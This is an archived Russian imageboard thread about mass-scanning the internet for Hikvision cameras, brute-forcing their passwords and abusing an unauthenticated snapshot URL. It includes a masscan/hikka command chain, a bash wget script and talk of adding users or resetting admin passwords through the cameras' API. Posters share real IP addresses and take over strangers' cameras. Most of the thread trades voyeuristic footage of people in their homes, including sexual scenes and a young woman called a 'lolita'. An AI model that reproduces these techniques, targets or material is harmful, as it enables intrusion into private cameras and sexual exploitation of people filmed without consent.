Этого треда уже нет.
Это копия, сохраненная 25 декабря 2017 года.

Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее

Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.
Проверка видеорегистраторов и IP камер Hikvision на простые пароли #104004 В конец треда | Веб
В этом треде проверяем видеорегистраторы и IP камеры Hikvision на простые пароли. О найденных проблемах сообщаем их владельцам. Для этого нам понадобятся блоки IP https://www.iwik.org/ipcountry/ или https://ipgeobase.ru/cgi-bin/AdvSearch.cgi , программы Masscan ( https://github.com/robertdavidgraham/masscan , https://mega.nz/#!R5tXlAZa!IihDrWMrCrXXjZz9nTkyBFDWi3OrClw70Bp_kSn9xv4 ), Grep (https://gnuwin32.sourceforge.net/packages/grep.htm ), Sort (https://gnuwin32.sourceforge.net/packages/coreutils.htm ) и Hikka ( https://github.com/superhacker777/hikka , https://mega.nz/#!34dUgKYb!fIOyCSbPQ7OntbexrvTwsFwIx-ZDFb2WKV6ZxaetU1U ). Запускаем: masscan.exe -p8000 -iL targets.txt --rate=100000 -oX myscan.xml && grep.exe -E -o "([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])" myscan.xml > result.txt && sort.exe -u result.txt > hosts && DEL myscan.xml result.txt && hikka -threads 200 -check -shoots good

В targets.txt нужно вставить блоки IP. В logins и passwords должны быть ваши логины и пароли. В папку good будут сохранятся изображения с камер. После перебора можно подключиться к видеорегистратору при помощи программы IVMS-4200 https://overseas.hikvision.com/europe/Tools_84.html .

Полный список команд hikka:

-bf-threads int Bruteforcer threads count (default 1)
-check Check cameras (experimental and not fully tested, but very useful)
-csv string Write result to CSV
-json string Write result to JSON
-logins string A file with a list of logins to bruteforce (default "logins")
-m3u string Write result to m3u playlist
-passwords string A file with a list of passwords to bruteforce (default "passwords")
-port int Camera service port (default 8000)
-shoots string Download pics from cameras into a folder
-threads int Threads count (default 1)

Предыдущий тред: >>100102 (OP)
#2 #104175
У меня masscan после запуска закрывается.
Что делать?
#3 #104192
>>104175
А у тебя не USB модем? С USB модемами Masscan не работает.
#4 #104199
>>104192
вифи
просто открываю. а он сразу закрывается.
#5 #104205
Подтверждаю, не работает. Вылет моментально
#6 #104206
Все, допер, выставил в свойствах совместимость с семеркой (я не разбираюсь, но это может выручить) и запуск от имени администратора. Все заработало, уже еду на сгуху.
#7 #104225
Чё там, суакпхацкир для 64-ых линупсов не замутил версию? Не собирается до сих пор?
#8 #104226
>>104225
суперхацкир, лол, фикс
#9 #104228
Просканил всю Россию и просматривю скрины. Бл#$%, в какой жопы мы живём!!!
#10 #104229
>>104228
Всю жопу ты так не увидишь, камеры ставят самые успешные.
#11 #104240
Помогите с массканом: когда сканирую диапазоны по этой команде "p8000 -iL targets.txt --rate=1000 -oX myscan.xml", всегда пишет "found=0", хотя Kport справляется отлично. Как это пофиксить?
#12 #104243
даешь новые скрины кто че откопал. пора освежить тему
17GGM7bbdik23 Кб, 352x288
#13 #104244
#14 #104253
О, наше дело еще живёт? Алсо, нескриппи, а сканите ли вы как-нить по 80 пору той же гидрой? Больше ли профит?
Интерестно так же, сколько в определенном диапазоне будет камер на 80 порту висеть не имея открытого 8000? Или 80 порт это скорее редкость и его никого не пробрасывают, а бросают онли 8000 порт? Интересно статистическое наблюдение. Дахуа, кстати, достаточно?
#15 #104257
>>104253
На порт 80 или другие http порта интересно искать в shodan если есть api key.
121,2 Мб, webm,
1920x1080
#16 #104258
Красота!
#19 #104296
>>104291
Ебать, ахуенно. Что за страна?
image118x21
#20 #104304
>>104291
США. Этот гандон пароль сменил. Вот тебе ип камеры 73.155.5.177
 1,8 Мб, 219x186
#21 #104305
>>104258
Нихуя себе как может!
dnr26 Кб, 576x704
#22 #104308
Украина :)
#23 #104309
#24 #104315
>>104304
Подобрал. Не такой уж и сложный.
110 Кб, 320x240
#25 #104331
#26 #104349
Двощ, смотри - я у мамы хаккер :))))

#!/usr/bin/env bash
#masscan -p8000 -iL hosts --rate=1400 | grep -Eo "([0-9]{1,3}[\.]){3}[0-9]{1,3}" > res.txt
INC=0
while read line
do
if wget -O "$line.jpg" --tries=1 --timeout 5 "https://$line/Streaming/channels/1/picture/?auth=YWRtaW46"
then
INC=$((INC+1))
else
rm -f "$line.jpg"
fi
done < res.txt
echo "Done - total: $INC"

по мотивам треда в /b
#27 #104362
Причесал скриптик - и надо признать довольно лампово получилось.в
https://github.com/makaka-hacker/kikka
Скрипт по списку скачивает /Streaming/channels/1/picture/?auth=YWRtaW46

Количество годноты возросло в разы: тут вам и траходромы в бохатых квартирах и просто пидорашьи конуры и .т.д и т.п.

Но:
1) часть снимков выходит битая - не только jpg качается
2) я хз как в баше потоки организовать - поэтому всего один
3) не windows :0
4) Все равно надо добручивать - искать пасс от годной камеры
5) bash не айс для таких дел

Добра анону, который в /b тред создал
#28 #104366
>>104362

Это у тебя только скрины или подобрал пароль к какой нибудь?
#30 #104370
#31 #104372
>>104370
Она его затроллила, а мужик оптимист
Аноним #34 #104394
>>104225
>>104226
Зачем она, собственно?

>>104229
Камеры ставят, в основном, магазины и склады. Причем, в таких тредах только самые нищие магазины и склады, у которых денег не хватило на нормальных специалистов, способных хотя бы пароль поменять.

>>104240

> p8000


-p=8000
admin12345171.1.63.154160 Кб, 1280x960
#35 #104407
admin_12345_171.1.63.154_1
Филиал сосача ИРЛ.
#36 #104408
>>104362
Под винду портируешь?
#37 #104418
>>104366
Это скрины камер с включенным веб интерфейсом.
Снимок с первого канала берется без пароля ( фича хикквижена :D )
В дальнейшем можно попробывать подобрать хиккой или же
https://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities
>>104408
возможно, хотя пока от скрипта толка мало
#38 #104424
>>104418
портируй под винду пожалуйста
#44 #104467
>>104418
Нехилая уязвимость. Спасибо анон
download (41)22 Кб, 704x576
#45 #104469
Поменял пароль и спи спокойно
#48 #104477
>>104394

>-p=8000


так вообще сразу вырубается, есть другое решение нулевого поиска?
#49 #104481
>>104362
Ты ловишь по RTSP протоколу?
download168 Кб, 1920x1080
#50 #104493
download (14)179 Кб, 2048x1536
#54 #104497
украинцы смотрят Шария
#55 #104498
одна пидофилия в основном
#56 #104499
Что у них там? я заинтригован
#57 #104500
>>104494
более!
#58 #104510
>>104385
Тот случай, когда толстожопые негры живут лучше тебя, анон.
#59 #104527
бордель
#66 #104534
Кстати, все эти камеры, обычно ИП камеры одиночки.
download78 Кб, 1920x1080
#67 #104535
В суши-баре смотришь как тебе готовят сашими
7239238145 Кб, 1280x720
#68 #104536
#69 #104537
Вообщем уязвимость эпическая. Я думаю ее устранят в следующей прошивке.
#70 #104538
Остаётся найти метод брута этих камер. Большество из них блокирует ип после 6 попыток так что нужны другие методы.

Ксати, пробовал читать стрим через rtsp но там без пароля не проходит

rtps://ip:554/Streaming/channels/1/?auth=YWRtaW46
#72 #104543
>>104538
При чём сдесь rtsp? эти камеры имеют вэб интерфейс. Сканируй восьмидесятые порты.
#73 #104544
>>104543
Я не про это а про то как видео получить ... Но это не важно теперь так как нашёл как добовлять новый юзер через веб интерфейс. Не работает на все камеры но есть уже успехи.

Могу поделиться методом в обмен на годноту

hk.hkPOJ.123ANUSmail-U;PUNCTUMrz*yu
Screenshot - 02062017 , 18110417 Кб, 291x456
#74 #104545
>>104543
Примерное кол-во теоритически уязвимых устройств.
#75 #104546
>>104424
Не, под винду не умею - если так уж интересно, то androidфона хватит - даже рут права не нужны
>>104481
Нет,это просто изображение :(

>>104467
>>104537
Хуйня на самом деле, я попробовал на паре камер -нихуя - видать уязвимы только камеры до 2013-2014 года

>>104538
-з8000 же хиккой или же прокси

>>104543
я сканирую сначала 8000 (стандартный порт) а затем 80
#76 #104547
>>104528
>>104498
>>104463
>>104457
>>104494
я не понимаю откуда столько годных камер? прошелся по Россие и Украине, нихуя годного не осталось, все просрали, в том году было лучше. Но этот анон выкладывает откуда-то берет годноту. Вангую что крысы все таки написали прогу которая меняет пароли к массивам новых камер на 8000 и потом крыса из этого массива по новому паролю отбирает годноту? У кого-нибудь есть инфа какой пароль на камерах сейчас?
#77 #104551
>>104547
Прочитай про уязвимость.
#80 #104554
>>104552
У поли сиськи няшные :)
#83 #104558
>>104554
Камера в хорошем месте
#84 #104561
>>104555
>>104556

>download (43).jpg


ты там в ручную что ли скачиваешь?
#85 #104565
>>104561
Загружаю на ftp сервер, и от туда скачиваю вручную
#86 #104570
>>104362
Как и на чем это запускать? Где-то в треде мелько про андроидофон, но даже на нем файл kikka вообще не распознается.
#87 #104571
А бля скажите как хикку запустить на линуксе? ./hikka? или че за хуйня помогите нубу.
#88 #104577
>>104362
Спасибо, охуенно.
чя116 Кб, 1035x525
#89 #104578
>>104362
собранный masscan из оппоста лежит в папке с киккой и scan.txt, чяднт?
#90 #104579
>>104578
блядь, гребанная недоось, еще надо установить надо сканер этот
#91 #104580
>>104579
Ты знаешь толк в извращениях - apt-get install masscan
или в скрипте добавлять что-то типа exec $(pwd)/masscan

>>104571
chmod +x ? ikka алсо права на раздел надо смотреть )
./?ikka

>>104570
Из терминала же -

https://github.com/makaka-hacker/kikka
Исправил пару ошибок
#92 #104581
>>104580

>пару ошибок


каких?
#93 #104582
Я так понимаю, это камеры RTSP протокола, которые не имеют записи.
Если да, то есть отличный брут на C# то есть проблема окон решается по щелчку пальцев, останется только допилить цикличную скачку скринов.
Но у этих камер нет записи в 90% случаев.
#94 #104583
>>104582
Сделаешь для окон?
Снимок799 Кб, 1920x1080
#95 #104584
>>104581
Папки "22:01:54" не создавались на FAT разделе
Сканировал только 8000 порт
и еще по мелочи

>>104582
rtsp требует логина и пароля, изображение нет

>цикличную скачку скринов



#### capture stream
"rec" )
echo "$2 -> rec_$2"
trap "echo EXIT; exit" SIGINT
mkdir "rec_$2"
while true
do
load "$2" "rec_$2/$(date +%s).jpg"
done
;;

Но, есть большой пиздец - камера начинает лагать при большой нагрузке - так что запилить если запилить скачивание в 60 потоков - ей хана
Не знаю будет видно на скрине или нет - но часть файлов 0 размера - я так понимаю >>104552 камера двух анонов уже не тянет

>>104544
Вот об этом поподробнее
#96 #104585
>>104584
То есть, ты конектишься без лога и пасса?
Не вкатываю в твою схему...

Получить видео можно не напрягаясь через SDK, кто знает python, на коленках за 3 минуты накатает.
#97 #104587
>>104585
Думаю для sdk нужен логин и пасс от камеры?

а для https://46.50.135.102/Streaming/channels/1/picture/?auth=YWRtaW46 не нужен
#98 #104589
>>104587

авторизоваться полюбому нужно, это базовая функция. Хотя бы логин но нужен.
Ты тупо берешь скрины с первого канала и все? не имея доступа к админке.
Камер без логина и пасса не существует. Ты дичь мне втираешь.
#99 #104591
>>104589
Открой глаза блеать https://46.50.135.102/Streaming/channels/1/picture/?auth=YWRtaW46

> Получить видео можно не напрягаясь через SDK, кто знает python, на коленках за 3 минуты накатает.


Так получи видео с той же 46.50.135.102 и нам обьясни - мы только рады будем
#101 #104593
>>104592
HiWatch - бюджетный бренд, разработанный компанией Hikvision, мировым лидером по производству систем видеонаблюдения.
Ну вот и все, теперь я все понял. А то без логина он конектится.
#103 #104595
>>104594
Ты дебил?
#104 #104596
>>104595
Не объяснишь по пунктам, где я дебил, пойдешь на хуй.
index62 Кб, 640x480
#105 #104597
#106 #104599
>>104596
Все понял о чем ты - нет, мы не брутим admin:

Сия хуйня по неизвестной прихоти хиквиженов /Streaming/channels/1/picture/?auth=YWRtaW46 доступна независимо от пароля админа
Лучше бы тред почитал внимательно, чем бомбить
Юhttps://www.hikvision.msk.ru/forum/26-3729-1
#107 #104600
>>104599
Я не бомбил, у меня иммунитет к этим тредам:)
Короче мини щелочка на получение картинок)
Фап-фап по кадрам)
#108 #104602
>>104584
верни старую версию, у меня ни с того ни с сего во время сохранения скриншотов после 50 насканенных камер обрывается
#109 #104603
>>104602
Держи https://github.com/makaka-hacker/kikka/blob/9aa1f185a8fe3ff16e846472d2bf1089e1f431fa/kikka

Там вроде ничего не изменилось...
При какой опции обрывается? ( start или rec ?)
Как именно обрывается? Полностью вылетает? Или wget начинает тупить
2252 Кб, 899x649
#110 #104604
>>104603
start, просто останавливается как будто бы просканировал все хосты. Из 32000 хостов всего 73 скрина (в прошлый раз оборвалось на 56 скринах).
Проверил старую версию кикки и тоже самое .
rec ip нормально вроде работает, но проскакивают битые скрины, хз из за чего.
#111 #104605
>>104604
причем проверил ip после которого done - он в 157 строке списка.
#112 #104608
Как соединить картинки в видео?
#113 #104610
>>104608
До 400 снимков- "Киностудия Windows Live" (Windows7). Импорт снимков в нужном порядке и задание длительности каждого из кадров около 0,03 сек.
Больше 400, когда эта программа не справляется- "Pinnacle Studio". Всё довольно быстро и качественно, много настроек. Единственное- долго думает при изменении длительности кадров
#114 #104611

>>1046>>104608


VirtualDub.
1. File –> Open Video File
2. В выпадающем меню типа файла выставляем «Image sequence».
3. Выбираем первый файл.
При условии, что картинки пронумерованы по порядку, имеют одинаковое разрешение, формат и не закодированы в неведомый формат он их автоматически подтянет в один ролик. Если ругнется при открытии файла — переконвертируйте их все в BMP, например.
4. Video –> Frame Rate…
5. Выставляем желаемую скорость кадров.
6. Video –> Compression…
7. Выставляем кодек, которым собираемся сжимать поток.
8. File –> Save as AVI…
9. Сохраняем.
#115 #104613
>>104605
похоже wget дохнет
Появляются ли логи в виде wget-0.log ?

Можно попробывать запустить bash +x kikka start твой файл

или лучше bash +x kikka brute файл с уже просканенными ip
#116 #104614
>>104611
>>104610
спасибо
187 Кб, 1280x720
#117 #104615
Здравствуйте
#118 #104616
Аноны сколько камер вы доите одновременно?
#119 #104617
>>104616
В смысле?
мв140 Кб, 1920x1080
#120 #104625
годноты вообще нет.
#121 #104638
>>104625
нихуя себе нет, встал колом ща
#122 #104645
Кстати, >>104584
У Полины на камере есть жд. Кому system user создать на этой камере в обмен на годноту? Пишите на hk.hk(s).123ANUSm3^YailPUNCTUMr[P)u
#125 #104654
>>104648
>>104647
это россия?
#126 #104658
>>104654
Москва
#127 #104659
>>104658
пароль стандартный был или ты подбирал?
#128 #104661
I uploaded some masscanned countries, so you don't have to.

https://mega.nz/#!dgFEBSYK!cckgYmtoNhf7BzC6rNVdlZ4pzE4B5DZftFa_EI4cF-M
#131 #104664
Есть что-нибудь гейское?
#132 #104665
>>104662
>>104648
что за мода ебаться под порнуху?
#133 #104666
>>104665
Когда долго живешь с кем-то, то партнер уже не воспринимается, как сексуальный объект, а скорее, как окружающая обстановка или часть собственного тела, например, рука. Нужно что-то, что возбудит.
#134 #104667
>>104661
Thanks bro. Huli na pendosckom bazarysh tut&?
#135 #104668
adminadmin217.208.164.1141203 Кб, 1920x1080
#136 #104669
#137 #104671
>>104666

> партнер уже не воспринимается, как сексуальный объект


почему? Тяночка же ахуенная на первом видео
#138 #104672
>>104671
Для тебя охуенная, для него обыденная.
#139 #104673
>>104662
У них же там иконы!!!
Ну что за богохульники!! Содомиты!!!
#140 #104676
>>104671
На первом видео там шлюша. К ней клиенты заходят
#141 #104677
>>104659
Я могу добавить нового не зная пыроль админа. До здраствует хиквижн
#142 #104680
>>104677
Как?
#143 #104686
>>104677
Это невозможно.
#144 #104687
>>104686
Опять ты, дебил.
#145 #104688
>>104686
Дай, ИП и докажу
#146 #104693
>>104688
Прокатывает с любым хиквиженом или нужна определенная модель/прошивка? Для этого фокуса нужно что бы был разрешен анонимный вход?
#147 #104694
>>104693
Прокатывает если получяется сделать скрин методом вышеуказаном
93.80.255.1780120170606105451981141 Кб, 1280x720
#148 #104696
#149 #104700
>>104694
Во всех случаях?
#150 #104701
>>104700
До сих пор во всех случаях
#151 #104702
>>104701
Ну, анон, что б тему не палить совсем, намекни хоть куда параметры передавать? А дальше мы уж сами додумаемся
#152 #104703
>>104702
Дам только один намёк. Читайте документацию PSIA
#153 #104704
>>104703
ты через GET нового юзверя скармливаешь?
#154 #104705
20170606140236222420 Кб, 1920x1080
#155 #104708
#156 #104709
>>104705
ISAPI/Security или через /doc/page ??
#157 #104710
>>104709
он врет, наличие возможности посмотреть картину с камеры без доступа в админку - единственная уязвимость, которую прикрыли в новых прошивках.
#158 #104711
>>104710
Едниственое что не получается, это изменить права нового пользовотеля, то есть после создания он не имеет никаких прав :(

По этому приходится просто менять пароль админа. Это делается очень лехко
#159 #104713
>>104711
ISAPI/Security или через /doc/page ??
#160 #104714
>>104711
Каким образом ты собираешься добавлять нового пользователя если у тебя нет пароля от admin?
#161 #104715
>>104713
Security
#162 #104716
>>104714
А каким оброзом ты качаешь скрин не имеея пароль админа?
#163 #104717
>>104713
doc/page это просто хтмл странички
#164 #104718
>>104711

>менять пароль админа


толсто, т.к. пароль может сменить только суперпользователь, т.е сам админ.
#165 #104719
>>104718
?auth=YWRtaW46
#166 #104720
>>104716
это уязвимость камеры без доступа к видеопотоку, а тем более к настройкам.
#167 #104721
>>104720
Ну не хочешь верить, не верь ... я больше не буду никого убеждать а просто буду искать годноты.

Если ктото сумеет создать ногого пользовотеля с правами просмотра тогда пишите на мыло hko5K.hk.123ANUSma:M}ilPUNCTUMr&M}u
#168 #104722
>>104721
А как создать нового пользователя без прав?
#169 #104723
>>104711
если получается сменить пароль админа, то какие-то права все же имеются.
Поясни этот момент. Выложи скрин админки со списком пользователей.
#170 #104724
>>104723
Добавление юзера состоит из двух этапов
1. Создание юзера
2. Создание прав

Это два разных запросов. Первый запрос получается сделать а второй, пока ещё не знаю как

Чтобы поменять пароль любого пользовотеля (в том числе админа) используется первый запрос
#171 #104727
>>104724
напиши запрос
#172 #104728
>>104727
Это вы уже сами ищите. А то если оставлю сдесь, школьники все камеры просрут
#173 #104729
>>104728
создай на этой камере пользователя с логином admin паролем 12345
#174 #104730
>>104729
109.173.79.188
отклеилось
#175 #104731
>>104730
На этой чёто не получается
<statusCode>3</statusCode>
<statusString>Device Error</statusString>
#176 #104732
>>104731
А ногого создал без проблем: system:system123
#177 #104733
>>104732
как так?
#178 #104734
>>104733
Не знаю, первый раз такое. Дай другой ИП
#179 #104735
>>104734
145.255.18.250
#180 #104736
>>104735

>145.255.18.250


Я понял почему не получалось с предыдущей. Пароль 12345 слишком простой и камера не принимает. Вот поменял пароль админа на 123456789abc
20170606174023593290 Кб, 1920x1080
#181 #104737
#182 #104742
>>104736
Это всё через строку браузера делается или нужно знать соснольные команды на linux?
#183 #104743
>>104742
Я использую curl. Можно также с помощу Postman в Chrome
#184 #104744
>>104743
Сложно это всё, не могу даже осилить банальное подключение к камере без ввода пароля, вводя в строке браузера: http:\\логин:пароль@айпи:порт
Перекидывает все равно на главную страницу с формой.
#186 #104747
>>104746
все равно выводит стартовую страницу, с незаполненными полями.
#187 #104748
>>104747
Да, дейстивтельно. Там немножко по другому. Веб интерфейс использует куки для аутентификации
1232115 Кб, 1040x585
#188 #104749
Почему не добавляется новый пользователь?
#189 #104750
>>104749
Пароль нужно писать в отдельном таге
<userName>test</userName>
<password>123456789abc</password>
#190 #104751
>>104750
все равно выдает:
<statusCode>5</statusCode>
<statusString>Invalid XML Format</statusString>
<subStatusCode>badXmlFormat</subStatusCode>
#191 #104752
>>104751
Вобшето нужно добовляти по одному юзеру а ты выпихал аж 3 сразу.
#192 #104753
>>104752
лол, я put и post перепутал, да и вообще уже мозги кипят, чему только не приходится учиться и вникать вуайеристу гуманитарию.
#193 #104754
ЮХУУУУ!!!!

Получилась добовлять оператора с правом просмотра не торгая админа!!!!
#194 #104755
>>104754
Круто, как тебе это удалось?
#195 #104756
>>104754
ты теперь сможешь просматривать любую камеру какую захочешь?
#196 #104757
>>104756
Только те с которых можно сделать скирн без пароля.

Ну раньше тоже мог, но нужно было трогать пароль админа ...
#197 #104758
>>104754
пили как сделал, хуле
#198 #104759
>>104757
ты гений, там столько годноты пропадает на этих камерах
#199 #104760
>>104759
Могу добавить для вас операторов. Вы только давайте ип адресса с годнотой. Например то что выкладывали скрины сдесь
#200 #104761
>>104760
Ладно, запущу вечером сканер, если найдется годная камера скину тебе на почту скрин.
1476699819410166 Кб, 796x600
#201 #104762
>>104757
Пруфы, Билли, нам нужны пруфы
#202 #104763
>>104762
Дай ИП и будет пруф
#203 #104764
Я не понимаю как можно авторизоваться на камере без пароля admin
#204 #104765
Выкидывает на авторизацию при отправке хмл, хотя камеру смотреть можно, чяднт?
#205 #104766
>>104764
Также как и просматривать скирны
#206 #104768
>>104766
по логину YWRtaW46 не авторизуется ни в одном из разделов isapi
#208 #104771
>>104770
На каком порту веб интерфейс?
2017-06-0712-21-2712 Кб, 780x268
#209 #104773
>>104771
вроде в этой нет веба. попробуй здесь
#210 #104774
>>104773
Я ведь обьеснял что проходит только с камерах с каторых можно сделать снимок с методом выше указаном
#211 #104775
>>104774
Ну я хуй его знает в каких камерах можно сделать снимок с веба. Как это проверить ?
#212 #104776
>>104775
Прочитай в начале треда
#213 #104777
>>104776
ой, в пизду еще красноглазить
#214 #104778
Как это возможно? Ведь при просмотре картинки с первого канала не происходит авторизации, а если бы она происходила, то при переходе в режим просмотра не запрашивало бы логин и пароль, т.к сведения об успешной авторизации уже хранились в куках
#215 #104779
Без авторизации /ISAPI/Security/UserPermission/1 не открыть, а метод с auth - не проходит
#216 #104780
>>104778
и то что есть баг с просмотром jpg производители сами признали и пофиксили новыми прошивками, но вот авторизация и изменение конфигурации это что-то невообразимое
#217 #104781
>>104779
И я про то же,не понимаю как это у него получается
#218 #104784
пиздит пади
очередная аттеншнхорь
#219 #104785
>>104494
Анон. Хочешь добавлю юзера на эти камеры? Пиши на мыло
#220 #104786
>>104785
Пожалуйста не пали никому, опять все проебут как джва года назад, теперь камеры в стримах мопса и вольнова.
#221 #104787
>>104786
Я не палю как добавить. Но могу добавить в обмен на годноту
#222 #104788
>>104787
Хорошо, только не пали, я вечером тебе закину на почту скрины с камер к которым хотел бы получить доступ. Добра тебе
#223 #104789
ОП этого волшебного метода - ХУЙ. У него нихуя не рабоатет. А замутил он это что бы выманивать годноту и кидать.
Расходимся
#224 #104796
>>104789
Если бы кинул когонибудь, уже написали бы здесь
#225 #104797
>>104796
если бы помог кому-то, то тоже бы написали
#226 #104798
чтоб быстрее качали скрины добавьте в конце URL

&videoResolutionWidth=640&videoResolutionHeight=480

А то есть скрины каторые весят пе 2 МБ
#227 #104799
>>104798
Так чем больше весят тем лучше качество же.
#228 #104800
>>104799
Когда брутишь я думаю не так важна качество как скорость ...
#229 #104801
>>104798
3000 скринов за сутки, максимум 890кб скрин, основная масса меньше 250кб
#230 #104802
>>104801
Я на 10 тредах качал и 20к в с утра до вечера. Правда у меня своя програ в C++ А ип читая не из файла а из базы данных mysql
#231 #104803
>>104802
Ты программист?
#232 #104804
#233 #104805
>>104803
Анонист он)))
#234 #104806
Не без того
#235 #104807
>>104803
Я думал здесь все програмисты
#236 #104808
>>104584
Антош, запили версию под винду плииз.\
Буду тебе годноту на почту кидать.
#237 #104815
Возможно я не прав, но некоторые скрины в названии файла с адресом, я ради интереса взял диапазоны где они по идее должны быть, так вот не один адрес не нашелся как порт 8000. раз 5 просканил.
#238 #104816
Какие скрины?
#239 #104817
>>104816
Аноним 27/05/17 Суб 19:07:55 №104362
#241 #104826
>>104825
В том то и дело, так показывает, но я же написал, в скане не находит.
#242 #104827
>>104826
чем сканишь ? И какой командой запускаешь?
#243 #104830
>>104787
Тоесть ты юзера добавить можешь а годноты найти нет?
У кого нибудь кроме него получилось добавить?
#244 #104832
Можно ли в хикке сделал вывод списка не пробрученных камер?
#245 #104833
>>104832
нет.
#246 #104834
я так понимаю -bf-threads это колличество потоков на одно камеру
-threads а это в общем?
Что за опция -check ? Почему она до сих пор эксперементальная? Она просто чекает если камера на заданном порту? Можно ли захуярить вывод только с этой опции?
#247 #104835
>>104834
Короче вывод я захуярил. hikka -threads 200 -check -csv list Только приходится в нотепаде заменять ,8000 на пустоту.
#248 #104836
нихуя ньюфажки подтянулись
sage #249 #104837
а я говорил что набегут школьники олококающие под видосики с кампрaнками на ютабе
#250 #104838
>>104836
>>104837
как же я с вас проиграл. Если вы про 4 поста выше от вас дебилов, то я в в этом треде уже давно сижу. Просто понадобилось получить именно список ип чекнутых на камеру, и которые хикка не смог пробрутить.
#251 #104839
сраная ньюфажина давно сидит в треде, бгг. Люди по три года в теме, а она тут в треде давно сидит - и перестала быть сраной ньюфажиной от этого

проиграл он. выиграй хоть раз, долбаеб
adminadmin123491.124.52.164114 Кб, 352x288
#252 #104840
чет проиграл
sage #253 #104841
#254 #104844
>>104839
Еще сильнее проиграл с долбаеба.
#255 #104846
Инцест или просто молодая с старым???
#256 #104847
>>104846
непохожи на пидорах
#257 #104848
>>104846
Эти тоже там порнуху смотрят что ли? Импотенты блядь
#258 #104850
>>104848
Нет, походу не порнушку, просто фильм или сериал
#259 #104851
>>104850
А че у нее рука на пизде?
sage #260 #104852
#261 #104853
>>104852
Нет, ITA
sage #262 #104854
>>104853
Выложи видео как они ебутся
#263 #104855
>>104854
Было позовчера но архив короткий
sage #264 #104856
>>104855
Жаль.
2017060811094977710,7 Мб, webm,
1920x1080
#265 #104857
Когда итальянская лолита хочет секса в 3 чеса ночи а папаша должен идти завтра утром на работу
#266 #104858
Для тех кто нашли как добавлять юзеров совет:

Добовляйте юзерa только когда хотите просмотреть камеру а в конце удаляйте его. Таким оброзом камера будет долго жить. Я лично так делаю.

А ещё смотрите в настройках если камера записана на какойнибудь DDNS.
#267 #104859
ты лично дрочишь на пустой экран
где пруфы?
sage #268 #104860
>>104857
так он ее не трахнул в итоге? и почему у нее пизда такая волосатая?
#269 #104861
>>104858
Почему ты все время пишешь как аутист? У тебя с головой всё в порядке?
#270 #104862
>>104857
дай ip
#271 #104863
>>104861
Я думал сдесь люди меняются идеями и методами. Если не нравится мои посты тогда идите нахуй и пользуйтесь вашей хиккой или киккой как первобытные.

Всем всего хорошого

Bye Bye
#272 #104864
да-да
кидалово не прокатило
улыбаемся и нахуй
#273 #104865
>>104860
Не трахнул, уснул.

А про пизду если хочешь узнать, проскань всю италию, зайди на камеру, включи двухсторонее аудио и спроси лично
#274 #104866
>>104863
съеби уже отсюда школьник аутист
#275 #104867
>>104865
Я сейчас швецию сканирую, надеюсь блондинистую няшку найти.
2017060812372863312,1 Мб, webm,
1920x1080
#276 #104868
Папаша вернулся в обед покушать а лолита ничего не приготовила а всё ещё лежит в постели.
#277 #104869
>>104868
Она каждый день дома что ли сидит? Почему не работает или не учится или он ее обеспечивает?
#278 #104870
По момему сейчас оттрахает
#279 #104871
>>104869
Такие детали не знаю, я вчера добыл эту камеру
sage #280 #104872
>>104870
ахуеть! пиши видео!
#281 #104873
Зачем люди ставят камеру над кроватью? Чем они руководствуются? Смотрят на себя в записи и дрочат?
20170608125132746328 Кб, 1920x1080
#282 #104874
>>104872
Ложная тревога, одевается.

Всё равно на камере есть ЖД. Завтра зайду посмотреть архив
#283 #104875
>>104871

hikkoй или же через веб интерфейс?
sage #284 #104876
>>104874
пиздец, а я то рассчитывал подрочить сейчас.
20170608130102221323 Кб, 1920x1080
#285 #104877
>>104874
Походу они оба какието пожарники или спасатели. На футболке написано PA CROCE D'ORO
Типа залатой крест, что-то похожее на красный крест. Они людям помогают а я блять ....
#286 #104878
>>104875
веб
sage #287 #104879
>>104877
у них на стене фото выблядка, он умер?
#288 #104880
>>104879
Мэн на него подрачивает и возбуждается, а потом ебет уже эту старуху.
#289 #104881
>>104868
- ХУЛЕ ТЫ ТУТ РАЗЛЕГЛАСЬ, МРАЗЬ? ПИЗДУЙ В ШКОЛУ! ТЕБЕ ЕЩЕ В ИНСТИТУТ ПОСТУПАТЬ! В ШАРАГУ ХОЧЕШЬ ПОЙТИ КАК ТВОЯ МАМКА?
мимо-переводчик
#290 #104882
>>104863

>Я думал сдесь люди меняются идеями и методами.


Ну так поделись методом, хотя бы еще намеков попроще дай. Я же не кулхакер раскручивающий скулю в алиэкспресе, да и вроде не аутист с бхф, но все равно нихуя не понял.
#291 #104883
>>104882

>еще намеков попроще дай


а залупу тебе на воротник не навернуть?
#292 #104884
>>104882
Ты понимаешь что если я выложу сдесь метод то школота убьёт все камеры?
sage #293 #104885
>>104880
Какая бля старуха, ей лет 17-18
sage #294 #104886
>>104884
Не забывай про вoльнова, мопса и кампранки, и вспомни 2015 год, тысячи камер и годноты.
sage #295 #104887
>>104886
Нельзя дать школошникам с пикабу/мдк проебать всё как всегда.
#296 #104888
>>104885
лол, дебил в сарказм и относительность не может. >>104886
>>104887 да и вообще сагу отключи дебил.
>>104884
Я понимаю. Поэтому и написал что, дай еще намеков. А лучше дай ip где этот сплоит сработает, а я буду пытаться спрашивать не тупые твои ответы.
sage #297 #104890
>>104884
не ведись на жалостливые позывы, такие как он радостно гыгыгыкая меняли пароли на камерах, писали на экране "Вас взломал, Вася777", включали двустороннее аудио и т.д.
#298 #104892
>>104884
тада хуле ты тут забыл? пруфов никаких, один пиздеж.
вроде прощался? вот и пиздуй туда, где школота камеры не убьет, если есть с чем пиздовать, кроме влажных мечтаний
#299 #104894
>>104882
Нормальный чек выложил бы клевых видосиков, написал "учитесь, сынки" и купался бы в лучах славы - если ни как кул хацкер, то хоть как поставщик годноты для босоты. а тут ебала какая-то
#300 #104895
>>104894
толсто
#301 #104896
>>104895
а я и не троллю. вон чувак надыбал камеру в италии - не обломался поделиться. чо, сильно потратился на этом? нет, респект ему. все бы так делали
#302 #104897
>>104896
так и будут делать, ты просто успокойся и жди годноты.
#303 #104898
>>104896
Тот кто дабыл камеры в италии и тот кто умеет добовлять юзеров одит и тот же человек
#304 #104899
>>104898
не пизди, тот пишет без ошибок
sage #305 #104900
